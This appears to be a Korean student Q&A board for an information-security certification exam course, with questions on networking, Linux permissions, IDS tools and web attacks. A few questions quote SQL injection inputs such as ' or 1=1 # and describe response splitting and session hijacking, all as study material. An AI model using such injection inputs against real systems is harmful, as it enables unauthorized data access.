안녕하세요, 2021 정보보안기사 강의 수강생 입니다. '10강 crontab 접근제어' 강의 중 41:25에서 강의 자료로 설명해 주시는 부분이 있는데 강의에서 쓰시는 강의 자료와 올려주신 강의 자료와 조금 달라서 문의드립니다. 올려주신 자료에서는 "두 파일 모두 없는 경우 데비안과 우분투 배포판은 이 경우 모든 사용자에게 실행 권한을 준다"고 되어있는데 맞는 내용인가요?
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
4-way handshake 실습에 관해 질문이 있습니다.
4-way handshake 실습을 따라하던 중 질문이 생겼습니다. 192.168.176.128(CentOS7), 192.168.176.129(Kali Linux) 환경에서 Kali가 CentOS7으로 telnet접속을 하고, CentOS7를 shutdown하여 연결을 종료했습니다. 이 과정을 wireshark로 패킷 확인 했는데, FIN+ACK, ACK, FIN+ACK, ACK가 아닌 FIN+ACK, FIN+ACK, ACK가 확인되었습니다. 어떤 이유로 이렇게 나왔는지, 제가 했던 과정에 어떤 문제가 있었는지 궁금합니다.
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
질문드립니다.
강사님 강의 정말 잘보고있습니다. 실습하는데 윈도우 7에서 ipconfig /display 하면 원하는 dns 정보가 나오지 않는데 어떤점을 확인해봐야할까요? ㅜ.ㅠ
2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]
연습장 자료 제공
강의를 듣다보니 연습장에 정리하신 자료가 있는데 그 자료는 제공이 안되는 건가요??
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
연습장 내용은 어디서 다운 받을 수 있나요??
2강 유닉스 리눅스 시스템 기본학습에 연습장 내용은 어디서 다운 받을 수 있을까요...?
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
(1:1 문의에 올려둔 질문이 더 보기 편하실 것 같아요~!)스택오버플로우에 대해서 또 카나리에 대해서 질문이 있슴니다!
말이 두서가 없을테지만 이런식으로 생각하는게 맞나 싶어서요! ------------------------------------------------------------- sp= 함수 수행 시 할당( 스택연산이 발생하는 위치 ) SFP= 함수 수행 시 특정 위치의 기준점 (?) 이 sp 를 저장하는 레지스터가 ESP 이고 SFP 를 저장하는 레지스터가 EBP 그 다음 명령을 저장하는 지점이 EIP 이니 SFP 가 변경 시 마다 EIP 도 다음 명령어가 존재할 시에 바뀌는 것이겠구요. SFP 가 이동할 때 마다 그 기준점 기준으로 data가 쌓이는 거구요. 여기서 오버플로우가 일어나면 RET 까지 SFP가 이동하여 DATA를 저장해 버리는 것이 오버플로우의 개념이 맞나요? 맞다면 여기에서 스택가드의 카나리가 어느지점에 들어가는 지 헷갈립니다 ------------------------------------------- ------------------------------------------------------- "스택가드는 추가의 함수진입과 종료코드를 삽입한다"라고 하는데 이것이 canary 값을 삽입한다는 뜻으로 이해해도 되는 걸까요? -------------------------------------------------------------------------------------------------------- 네 이런식으로 이해한다면 추가되는 " 함수 진입 코드는 지역변수를 위한 공간을 할당하기 전에 이전 SFP 앞에 canary를 기록한다. 추가되는 함수 종료 코드는 이전 SFP를 복원하고 제어를 반환주소로 이동하는 보통의 함수 종료 연산을 수행하기 전에 canary 값이 변경되었는지 검사한다." 라는 말을 하나씩 풀어서 이해해보자면 이전 SFP 사이에 canary(함수 진입, 종료 코드)를 할당한다. // 이후 sfp가 아닌 ret 근처에 들어가는 것이 맞지요? ----------------RET----------------------------- (함수종료코드) canary (함수진입코드) -----------------이전 sfp------------------------- 라는 그림이 그려지는 것이 맞나요? 이게 맞다고 가정하면 실질적인 반환주소에 가기 전 canary의 함수 진입코드와 종료코드를 거쳐 연산이 반환되기 전에 임의의 RET값을 수행하여 canary 값을 계산해 본다 라는 말이 될까요? ---------------------------------------------------------------------------------------------------------- 이때 버퍼오버플로우 시도가 발생되었다고 가정하면 SPF 의 값과 RET을 변경이 될 때 canary값도 변경이 되었기에 변경이 된 것을 확인하면 공격으로 인지하고 프로그램이 종료가 되는 것 맞나요? 물음표 투성이네요ㅠㅠ..... 교수님 ㅠㅠ 근데 여기 엔터가 안들어가서 읽기 불편하실 것 같아요 ㅠㅠㅠㅠ 1:1문의에 올려둔 글이 더 보기 편하실 것 같은데 괜찮으려나 모르겠네요
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
질문있습니다!
지금 snort 공부를 하고 있는데 우연히 탐지패킷로그는 pcap형식으로 tcpdump나 wireshark같은 패킷분석도구를 통해서 패킷내용을 확인할 수 있다고 나와있어서 질문드립니다. 1. snort와 tcpdump의 상관관계가 어떻게 되나요 2. snort와 tcpdump는 그냥 기능적으로 패킷 스니핑용으로 비슷한건가요?? 3. tcpdump는 흘러가는 패킷을 스니핑을 해서 와이어샤크처럼 보는 걸로 알고 있었는데 교재안에 alert로 탐지패킷로그를 남기면 tcpdump로 패킷내용을 확인할 수 있다고 해서 헷갈린건데 tcp가 흘러가는 패킷 스니핑을 해서 일시적으로 보는 기능인가요 아니면 저장해있는 로그를 분석하는 용도인가요??
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
HTTP 응답 분할 취약점 질문드립니다.
첫번째 응답을 개행문자와 Content-Length : 0을 이용하여 종료하고 두번째 응답에 공격자가 만든 스크립트를 삽입한다는 동작원리는 이해했습니다. 근데 첫번째 응답에 바로 공격자가 만든 스크립트를 삽입 할 수 는 없는것인지 왜 응답을 굳이 2개로 나누는지 이해가 되지 않습니다.
2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]
강사님 질문있습니다!
안녕하세요 현재 sql인젝션부분을 공부하고 있습니다. 강의를 듣다가 갑자기 궁금증이 생겨 질문드립니다. php.ini 설정파일에서 magic_guotes_gpc를 on을 한다면 특수문자를 escape처리를 한다고 배웠습니다. 그럼 혹시 입력값을 '' or 1=1 #을 한다면 where id = '/'' or 1=1 # pass=''이 되서 아이디 입력값을 /'으로 인식하고 뒤에 1=1은 참이라 공격이 먹히는게 아닌건지 궁금합니다!
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
TTL os finger printing 에 관한 질문입니다
TTL 이 os fingerprinting이 될 수 있다고 배웠습니다. 그런데 이 TTL 값이 ping을 보내는 클라이언트의 os 에 대한 정보인지 ping을 받는 서버에 대한 정보인지 교재에는 확실하게 써 있지 않은 것 같아 문의드립니다. (스스로 가상머신에다가 테스트 해봤는데)ping을 받는 쪽에 대한 os 정보를 알려주는 것 같지만, 확실히 하고 싶어서 문의드립니다.
2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]
28강 PATH 설정 관련 문의드립니다.
안녕하세요 교수님 정보보안기사 실기 강의 잘 듣고 있습니다. 다름이 아니라 28강 PATH 설정 관련하여서 문의드립니다. 보안설정으로 PATH 변수를 경로 맨 앞 또는 중간에 "."가 포함되어 있는 지 확인하여 맨 뒤로 이동시키거나 삭제라고 되어 있는데요. 실제 동영상 강의 내용에서 현재 디렉토리(.)를 PATH 에 추가하는 내용은 있는데 실제 취약한 PATH 설정에 대해서 "."를 삭제 할 때는 어떤 식으로 명령어가 사용하는지도 중요할 것 같은데 명확히 안 나와 있는 것 같습니다. 확인 부탁드립니다. 감사합니다!!
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
암호학파트 상세히 설명해주시나요..?
아직 강의가 없어서 불안한 마음에 여쭤봅니다. 이쪽 파트가 약한편이라서요 ㅠㅠ..
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
스머프어택 질문있습니다.
대응책중에 브로드캐스트 주소로 전송된 ICMP Echo Request 메시지에 대해 응답하지 않도록 시스템 설정을 한다. 부분에서 이 시스템 설정을 하라는 게 희생자PC인가요? 아니면 Amplifier 네트워크인가요?? 당연히 대응책이니 희생자PC이긴 하겠지만, Request메시지에 대한 응답이면 증폭네트워크가 하는 것 같아서 이해가 안되서 질문드립니다!
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
강사님 질문이 있습니다!
공부하다 보면 IP주소가 예를 들어 192.168.212.0/24 : IP대역 이렇게 적혀 있는 부분이 있는데 0/24 라는게 0~255다 이런 의미인가요? 아니면 0~24 이런 의미인가요??
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
교수님 질문있습니다.!
현재 2021년 실기 이론편 189쪽을 보고 있습니다. 44강을 보고 궁금증이 생겼습니다. TCP 세션 하이재킹 부분에서 그림안에서 3번을 보면 공격자가 클라이언트의 IP를 스푸핑하고 seq넘버와 ack넘버를 그대로 예측해서 보내고 페이로드 길이를 바꿔서 보낸다고 하셨는데 첫번째 질문 : 클라이언트와 서버가 연결상태라면 처리 속도가 빠를텐데 그 타이밍을 어떻게 맞추는지 두번째 질문 : 서버 입장에서는 클라이언트와 공격자가 거의 동시에(그림 상 클라이언트 패킷이 먼저오고 공격자의 패킷이 온 상황) 패킷이 왔는데 왜 공격자의 패킷으로 클라이언트한테 대답을 주는 건지 궁금합니다!!
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
교수님 질문있습니다!
ICMP Redirect공격은 L2스위치환경에서 일어난다고 하셨는데, 복습하다보니 궁금증이 생겼습니다. 경로 설정이라면 IP 헤더에 있는 목적지 IP를 가지고 일어나고 공격도 라우터/게이트웨이에서 일어난다고 하셨는데 왜 3계층이 아니고 L2스위치 환경에서 일어나는지 궁금합니다!
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
IPSec 터널모드 비보호 구간의 의미
터널 모드의 경우 종단(송신) - 게이트웨이 - 인터넷 - 게이트웨이 - 종단(수신) 이러한 구조가 있다고 할 때 ----------IPSec 적용구간---------- (교재 p276)종단 노드 ~ 게이트웨이 구간은 비보호 구간, 게이트웨이 ~ 게이트웨이 구간은 IPSec 적용 구간이라고 나와 있습니다. 질문 1. 이 두 구간의 차이가 무엇인가요? 원본 IP 헤더와 페이로드를 IPSec헤더(와 트레일러) 및 New IP로 감싼 상태로 메시지가 오고가는 구간을 IPSec 적용 구간, 아닌 부분을 비보호 구간이라고 표현한 건가요? 질문 2-1. 만약 원본 IP+페이로드를 IPSec으로 감싼 부분이 IPSec 적용 구간이라면, 비보호 구간인 종단 노드~게이트웨이 구간은 원본 IP가 (암호화되지 않고) 그대로 노출되는 구간이라고 생각됩니다. 그렇다면 ESP/터널모드의 경우 "원본 IP 헤더는 암호화되어 있기 때문에 터널/보안 게이트웨이와 종단 노드 구간의 트래픽 흐름의 기밀성이 보장된다"는 틀린 말인가요? 원본 IP 패킷이 오고가니까요. 그렇다면 이 구간도 공격자가 스니핑을 통해 트래픽 흐름을 알 수 있는 구간이 되지 않을까요? 질문 2-2. 만약 비보호 구간도 IPSec으로 감싼 부분이라면, 종단 노드와 게이트웨이는 New IP 헤더의 주소 정보를 통해 메시지를 주고 받나요? 그렇다면 New IP 헤더 정보가 송신지부터 수신지까지 계속 드러나있기 때문에 트래픽 흐름의 기밀성이 보호가 안 되는 것 아닌가요? 질문 3. 터널모드에서 종단 노드와 게이트웨이는 원본 IP 헤더 정보를 바탕으로 메시지를 주고 받나요, 아니면 New IP 헤더 정보를 바탕으로 메시지를 주고 받나요? 어떤 주소 정보를 통해 메시지를 주고 받는지 궁금합니다. 질문이 많지만 중요한 부분이라 꼭 답변 부탁드립니다 교수님 ㅠㅠ
2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]
리눅스 터미널 chown 질문
which chown으로 봤을 때 chown의 퍼미션이 755인데도 일반계정으로 chown가 실행이 안됩니다. 왜 그런지 이유를 모르겠습니다. sudo나 su 없이 일반 사용자가 chown 사용하게 하려면 어느 설정을 건드려야 하나요? (터미널 사진을 찍으려다보니 useradd도 같은 상황인 것을 알게 되었습니다.)
2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]
setuid가 설정되어 있는데 왜 검색 결과에는 나오지 않는건가요?
sgid.out는 setgid가 설정되어 있고, sugid.out는 setuid, setgid가 설정되어 있고, suid.out는 setuid만 설정되어 있는 것으로 첨부파일을 보면 확인하실 수 있습니다. 근데 왜 find . -perm 4000를 검색했을 때, setuid만 설정되어 있는 suid.out가 출력되어야 한다고 생각하는데 왜 검색되지 않나요?
2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]
다른분들의 문의가 빗발치는 바쁘신 와중에 개행처리 관련 문의 드립니다.
다른분들의 문의가 빗발치는 바쁘신 와중에 문의 드립니다. Slow Header Dos 나 HTTP응답 분할 취약점에서 개행처리로인한 문제가 발생되는 것으로 알고있는데 제가 공부한 바로는 헤더의 각 필드는 이미 개행으로 분리가 되는걸로 알고있거든요 1.slowloris에서는 왜 빈라인(개행)를 하지 않아 발생한다도 있지만 단순 개행처리만 하지 않아 발생한다라는 문장도 많이 보이던데 왜 이렇게 표현이 될 수 있는지 궁금합니다. 2. 응답분할취약점에서도 같은 맥락으로 헤더는 어차피 개행으로 분리가되는데 set-cookie이후 Content-Length에 개행처리를 해서 응답이 두개가 되었다는게 저는 조금 이해가 안되서요 .. (그냥 요청파라미터 값을 서버에서 set-cookie되거나 할때 나타나는 버그 같은 건가요?) 제가 잘못알고 있는게 있으면 혼쭐내주시면 감사드리겠습니다..
2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]
TCP Port Scan
올해 7.11일에 시행된 9급 국가직 공무원 네트워크보안 문제 9번(RFC 793을 준수하는 시스템의 닫힌 포트에 대해 TCP FIN, NULL, Xmas 스캔 시 시스템의 반응)을 푸는데 보기에 RST, RST + ACK가 있었으나 정답은 RST로 처리된것을 확인했습니다. 또한 유튜브에 해당 시험의 해설강의가 올라와있길래 보는 도중 Xmas Scan이 모든 Flags를 1로 설정한다고 표시한다 라고 하고 있었습니다.
제가 알고 있는건 Xmas는 URG, PSH, FIN Flags의 설정이고 위의 FIN, NULL, Xmas 스캔은 ACK Flag가 포함되어있지 않아 RST + ACK Flags가 설정된 응답을 보낸다는것입니다.
잘못 알고있는것일수도 있어 nmap 홈페이지와 RFC793 문서를 찾아봤지만
Sets the FIN, PSH, and URG flags, lighting the packet up like a Christmas tree.(Nmap)
If the ACK bit is off, sequence number zero is used,
2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]
46. 046.네트워크기본학습_16 /p196~200 질문드립니다.
안녕하세요 강사님. 항상 좋은 강의 감사하게 듣고있습니다! promiscuous모드는 더미 스위치 환경에서 모든 포트에 프레임을 전달하지만, NIC에서 나의 맥주소가 아니면 프레임을 버리기 때문에 스니핑 하기 위해 설정하는 모드라고 이해를 하고 있습니다. 그런데 만약에 L2스위치의 모니터링 포트에 리눅스 분석서버가 연결 되었다고 한다면, promiscuous모드를 설정하는게 맞는지 안하는게 맞는지 궁금합니다. 이론상으로 L2스위치에서는 모든 포트로 패킷을 전달하지 않기 때문에 패킷을 분석하려고 모니터링 포트를 연결 하는 것인데, 모니터링 포트를 통해서 통신하는 패킷을 미러링하여 리눅스 분석서버로 전달해준다고 하여도, 리눅스 NIC 입장에서는 "나한테 온 패킷이 아니구나"버리기 때문에 더미 스위치 환경처럼 promiscuous모드를 설저하는게 맞다고 생각이 들긴합니다만 맞는지 궁금하네요....
2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]
inetd standalone방식
안녕하세요 문의드립니다 문제편에서 tcpwraaper에서 접근제어를 할때 telnet은 in.telnet ssh는 sshd로 표현을 하던데 inetd 방식과 stanalone 방식에 따라 서비스가 나뉘는건가요? 예를들어 ssh는 무조건 sshd 이렇게요.. 난해한질문에 답변부탁드립니당
2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]
39. 039.네트워크기본학습_09 /p168~172 질문드립니다.
안녕하세요 강사님. 해당 수업의 IP 라우팅 설명 중 "목적지 주소와 자신의 주소가 서로 동일 한 경우 목적지가 자신의 호스트이므로 상위 계층으로 데이터를 전달한다." 위의 설명이 루프백인 경우에는 데이터를 전달 할 필요가 없으니, 상위 계층으로 전달 하는 것이고, 만약 목적지 주소가 자신의 호스트주소가 아니라면 2계층으로 전달하고 2계층은 1계층으로 전달한다고 생각하면 될까요?
2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]
rotbots.txt 질문
안녕하세요 교수님 항상 친절한 답변 감사드립니다!!. 다름이 아니라 robots.txt 에 대해 궁금한게 있어서 질문드립니다! UTM ESM SIEM 질문 이전에 올렸던 질문인데 답이 아직 안달려서요 ㅜㅜ. 1. 만약 User-agent: * Disallow: /home 이런 robots.txt 파일이 있다면 모든 검색로봇에 대해 home 디렉터리 접근을 차단하고 있다는것을 알수있는데 그럼 그외 다른 디렉토리는 접근할수 있나요? 예를들어 /board 나 /home/index.php 같이 저 robots.txt 파일에 명시되어 있지 않은 페이지에 대해서는 디폴트로 어떻게 처리하는지 알고싶습니다.. 2. naver.com/robots.txt 파일이 User-agent: * Disallow: / Allow : /$ 이거인데 어떻게 해석을 하면 좋을까요?.. Diallow: / 이니깐 모든 디렉터리에 대한 접근은 차단이고 Allow : /$ 이거는 어떻게 해석해야될까요??? ※ Allow: /$ 가 아니고 Allow : /$ 이렇게 메모장으로 저장이 되어있습니다. 일부로 Allow의 문법을 틀리게 적은걸까요?? 만약 문법을 틀리게 적으면 어떤 에러가 나나요? 아니면 주석처리한것 처럼 그냥 무시를 하나요?? 첨부파일로 naver.com/robots.txt 파일 보내드립니다!!! 자꾸 쓸데없는 질문을 한것같아 죄송합니다 ㅜㅜ
2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]
SSL/TLS 관련 문의
책 문제편 290번을 푸는 도중 네트워크 계층과 어플리케이션 계층 사이에 위치해 데이터 보안 서비스를 제공하는 프로토콜이 SSL이라고 답이 적혀져 있습니다. 하지만 이론편의 SSL/TLS는 전송계층과 어플리케이션 계층 사이에서 동작한다고 나와있는데요 어떤것이 정확한건가요?
2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]
URL 과 URI
GET과같은 요청방식을 설명할 때 URL 이나 URI 둘다 맞는 표현인가요? URI 안에 URL 이 포함되어있다고 간단히만 알고있는데 URL을 써야하는 답에 URI를 써도 의미가 어느정도 맞나요?? 답변이 곤란하시겠지만 ... 어차피 구분해서 외울꺼긴한데.. 강사님의견이 궁금하여 문의드립니다. 감사합니다.
2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]
ARP 스푸핑 질문드립니다!
강사님 안녕하세요! 033.네트워크기본학습_03 /p150~151 강의 학습 중 궁금한 부분이 생겨서 질문드립니다. A(희생자),B(공격자),C(희생자) 3개의 호스트가 있다고 가정 하였을 때, B공격자가 A,C의 ARP Cache Table도 변조 한 상태이고 A는 C라고 인지하여 B에게 패킷 보냈다고 한다면, 어떻게 IP Forwad가 되는것인지 궁금합니다... B(공격자)기준 A(희생자)의 패킷을 받게 되면, 이더넷 프레임 목적지 맥주소는 B(공격자) 맥주소 일텐데 어떻게 목적지가 C라고 판단하면 C로 포워딩을 해줄 수가 있는건가요? IP프로토콜에 대한 이해가 아직 많이 부족한거같습니다.ㅠㅠ
2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]
UTM ESM SIEM
안녕하세요 교수님 보안장비에 대해서 궁금한점이 있습니다. 1. UTM은 하나의 장비에 여러가지 보안 기능을 탑재한 장비라고 하셨는데 그럼 만약 'A' 라는 UTM 장비가 있으면 이 A에서 방화벽, IPS, IDS, VPN 등등의 역할을 하는것인가요?? 각 보안장비들의 로그들을 취합해서 보여주는게아니라 'A' 장비 혼자 다양한 보안장비의 기능을 하는건가요?? 2. ESM이랑 SIEM 차이점을 알고싶습니다. 둘다 다양한 보안장비들의 로그 들을 취합해서 보여주는 모니터링 장비가 맞나요?? 차이점을 알고싶습니다. 아니면 보통 구분없이 쓰나요??.. 제가 근무하는 사이트에선 Splunk라는 장비를 SIEM이라고 하는데 맞나요?? 3. AD(Active Directory)에 대해서 간단하게 설명해주실수 있나요?? 구글링해도 '여러 사용자들의 계정 정보나 정책들을 가지고 있는 데이터베이스' 정도로 나오는데 NAC이랑 조금 헷갈립니다 ㅜ
2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]
90강 내용중 질문있습니다
실습해주신 부분에 보면 /var/www/html/admin/디렉토리 하위에 admin.php 와 agsmgr.php 페이지를 모두 갖고 있는데왜 agsmgr.php로만 인식되나요??
2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]
robots.txt 질문
안녕하세요 교수님 다름이 아니라 robots.txt 에 대해 궁금한게 있습니다. 1. 만약 User-agent: * Disallow: /home 이런 robots.txt 파일이 있다면 모든 검색로봇에 대해 home 디렉터리 접근을 차단하고 있다는것을 알수있는데 그럼 그외 다른 디렉토리는 접근할수 있나요? 예를들어 /board 나 /home/index.php 같이 저 robots.txt 파일에 명시되어 있지 않은 페이지에 대해서는 디폴트로 어떻게 처리하는지 알고싶습니다.. 2. naver.com/robots.txt 파일이 User-agent: * Disallow: / Allow : /$ 이거인데 어떻게 해석을 하면 좋을까요?.. Diallow: / 이니깐 모든 디렉터리에 대한 접근은 차단이고 Allow : /$ 이거는 어떻게 해석해야될까요??? ※ Allow: /$ 가 아니고 Allow : /$ 이렇게 메모장으로 저장이 되어있습니다. 일부로 Allow의 문법을 틀리게 적은걸까요?? 만약 문법을 틀리게 적으면 어떤 에러가 나나요? 아니면 주석처리한것 처럼 그냥 무시를 하나요?? 자꾸 쓸데없는 질문을 한것같아 죄송합니다 ㅜㅜ
2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]
세션 쿠키와 세션 방식은 다른거죠?
안녕하세요 문의드리는 내용은 2020년 보안기사 책의 p.332 페이지입니다. 쿠키의 세션 쿠키와 세션 방식은 다른건가요?? 뒤에 XSS 등에서 탈취할 정보 중 쿠키(세션쿠키를) 탈취한다 라고 말씀해주셨는데 헷깔려서요;;
2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]
감사합니다 교수님
궁금한게 있습니다. 1 TCP-Xmas 스캔 공격이 UPF 플래그가 설정된 패킷을 보내는 걸로 알고있는데 어떤 블로그에서는 X-mas 공격을 '모든 TCP 플래그가 설정되어있는 공격', '여러개의 TCP 플래그가 설정되어 있는 패킷을 말하며 주로 UPF 플래그가 설정되어있는 패킷이 일반적이다) 이렇게 설명하는데 정확한 TCP X-mas 스캔 공격의 정의는 무엇인가요?? 2. SQL 인젝션 공격에서 ~ Like '%' and 1=1 이라는 공격구문을 실행하여 DB의 모든행(게시판 내용)을 출력해주는 실습이 있었는데 ~Like '*' and 1=1 이렇게 해도 되는건가요?? '%'는 1개의 문자만 표현하는걸로 알고있어서요... 또 ~ Like '%' and 1=1 과 ~ Like '%' or 1=1 은 서로 다른 결과값을 나타내나요?? 둘다 결국에는 모든행(모든 게시판 내용)을 출력해줄것 같은데 결과가 궁금해서요 ㅜㅜㅜ ※교수님 강의 매우 매우 재밌게 잘 듣고있습니다. 하나하나 실습해주시는것도 고맙고 비전공자들을 이해하기 위해 노력하시는 모습때문에 더 열심히 공부해야겠다는 생각이 듭니다. 지금 비록 관제업무를 하고있지만 수박 겉핥기 식의 지식이 많았는데 교수님 강의를 듣고 평소에 애매하게 알고있던거나 궁금했던것을 많이 깨우칠수 있어서 좋았습니다. 감사합니다 교수님 지금 CSRF 공격까지 강의를 들었는데 DOM XSS 공격을 제외하고는 모두다 이해가 잘 되었습니다,(DOM XSS는 제가 머리가 나빠서 구글링을 통해 좀더 공부를 해야 될것같습니다.) 보안기사 따고 CISA 나 CISSP 또는 CCNA,CCNP 를 따려고 했습니다.(보안기사와 중복되는 내용이 많아서..) 근데 교수님 말 듣고는 웹 프로그래밍 언어를 먼저 공부해야겟다는 생각이 들었습니다. html, CSS, JS, PHP 이런 스크립트나 언어는 웹 보안쪽 일을할떄 필수더라구요 ㅜㅜ 맨날 구글링 하는것도 일이고.. 한번 마음먹고 공부하는게 좋을것같네요 ㅎㅎ 항상 감사합니다 교수님. 강의 기간이 만료되면 Q&A를 쓸수 있을지 모르겟지만 꼭 합격 후기를 남기고 싶습니다 감사합니다.
2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]
난독화 문의
1. 10진수 난독화에서 eval()이라는 함수기 악성코드(자바스크립트코드)가 맞는지 검증한 후 실행한다고나와있는데 이 검증과정이 왜필요한건가요 ?? ....아니면그냥 난독화별로어떻게 생겼는지만 알아두고 넘어가면되는것인지.... 쓰다보니 두서없게 질문드리는데 양해부탁드립니다..
2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]
결제 금액 문의
재수강이나 연장신청은 금액이 어떻게 되나요?
2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]
문의
안녕하세요 실기이론책 p538 맨 위 그림에 mv 명령어를 이용한 파일변경 예시가있는데 인강에서는 변경될 파일명에 경로까지 지정해주고 책에서는 딱히 되어있지않은데 자동으로 앞에있는원본 파일경로를 참고하는거인가요??
2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]
실기 인강 범위
131~133강 암호학 / 134 ~ 135 시큐어 코딩 특강부분도 정보보안기사 실기 범위 포함인건가요?? 암호학 부분은 출제 비중이 높지 않다 라고 언급하신 부분이 있어 문의 드립니다
2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]
2020년 실기 69강 내용 중 질문이 있습니다
DNS 캐시 포이즈닝의 대응책에 나와있는 것 중에 2번 항목이 [ 도메인 관리용 DNS 서버(Authoritative 네임서버)는 재귀적 질의(Recursive 쿼리)를 허용하지 않도록 설정하고 ~~] 라는 문구에서 말씀하시는 Authoritative 네임 서버 = 그림 7.1.3 의 algisa.com DNS서버인가요? 아니면, Recursive DNS 서버(캐시서버)인가요? 말씀하시는 Authoritative 네임 서버 가 = 그림 7.1.3 의 algisa.com DNS서버라고 한다면, 사용자가 DNS 질의를 했을때에 Recursive DNS 서버(캐시서버)의 캐시에 없다면 답변을 해주지 않는건가요?? Recursive DNS 서버(캐시서버)는 ISP 업체에서 사용하는 공통의 DNS 서버인데 이럴경우 응답을 못해주는것 아닌가요??? 헷깔립니다ㅠ
2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]
산업기사 문의
안녕하세여 2020 실기 P443 보안서버 구축의 법적근거부분도 상식적으로 알면좋겠지만 산업기사 바운더리에 포함되나요??
2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]
2020년 실기 68강 내용 중 질문이 있습니다
dig 실습 보여주는 장면을 실습해보는데 dig @168.126.63.1 www.google.com ns와 dig @168.126.63.1 google.com ns 의 차이점을 잘 모르겠는데 결과가 달라서요ㅜ 설명 해주세요.... 왜 강의하실 때 www을 빼고 하셨는지...궁금해요
2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]
sloworis
SLOW HTTP HEADER DOS 공격은 메소드 상관이 없나요?
2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]
2020년 실기 44강 내용 중 질문 있습니다.
ACK 의 ack.num 값을 - 없는 상태로 보낼지 아니면 이전의 syn.num+데이터부의 길이 로 보낼지는 다음에 보낼 패킷이 있는지 없는지에 따라 달라 진다고 했는데 TCP Connection flag 인 URG,ACK,PSH,RST,SEQ, FIN 등에 따라 나눠지는건가요? 어떤걸 보고 다음에 패킷이 있는지 없는지 확인하나요
2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]
산업기사
실기시험은 총 몇문제인가요,,, OT나 책에는 기사기준으로만 나온거같아서요
2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]
정보보안산업기사 실기강의
정보보안산업기사 실기보려고 하는데 범위가 어디까지인가요?? 2020 실기시험대비 강의기준으로 몇강의까지 들어야되는지 확안부탁드려요
2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]
world writable 파일 질문있습니다.
안녕하세요 교수님 강의 너무너무 잘듣고 있습니다. 감사합니다!! world writable 파일이 "모든 사용자(others)에게 쓰기 권한이 부여된 파일" 이라고 적혀있는데 여기서 말하는 모든사용자가 others를 말하는건가요??? 아니면 소유자,소유그룹,다른사용자 다 포함인가요 예를들어 r_xr_x_rwx 이런 파일을 world writable 파일이라고 하나요 아니면 소유자와 소유그룹,다른사용자 모드 w가 있는 rw_rw_rwx 이런 파일을 world writable 이라고하나요?? 중요한건 아닌것같지만 그냥 궁금해서 여쭈어봅니다 ㅠㅠㅠ 그리고 이건 여담인데 혹시 보안관제에 대해서는 어떻게 생각하시나요?... 현재 인포섹에서 보안관제 업무를 1년째 하고있는데 남들은 관제는 어디가서 보안했다고하면 안된다, 경력이 아니다 이런소리가 있어가지구요 ㅜㅜ 차후 목표는 취약점 진단과 모의해킹 업무를 하는것입니다... 감사합니다!!
2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]
4 way handshake
1 .4 way handshake close과정에서 첫번째 fin + ack에서의 ack는 이전 전송된 Data에 의해 발생한거라고 이해했습니다. 하지만 lask_ack의 상태에서는 이전 fin + ack의 fin에 대한 ack를 전송하고 새로 받은 data가 없음에도 불구하고 불구하고 왜 다시 fin신호와 ack 신호를 함께 보내는지 이해가 잘 되지 않습니다. 2. 또한, 제가 직접 실습을 했을때엔 첫번째 close wait상태에서 ack를 전송하는 과정이 빠지고 fin+ack만 연속적으로 두번 나타났는데 왜 이런 상황이 발생했는지 궁금합니다. 3. 첫 fin+ack과정에서 이전 data에 의해 ack가 발생한다고 말씀하셨는데, 종료 이전에 마지막으로 받은 data에 대해 내용 없이 ack만 전송했다고 한다면 종료를 위한 fin flag만 설정해서 보내질 수도 있지 않나요? 그렇게 되어 해당 fin에 대한 ack를 보내고 마지막으로 서버가 종료하기 위한 fin을 보내고 클라이언트에서 해당 fin에 대한 ack를 보낸다 하면 결국 fin - ack - fin - ack가 정확한 상황이 될 수 있지 않나 궁금합니다 클라이언트로는 Ubuntu 18.04.2 LTS 버전을 이용했으며, 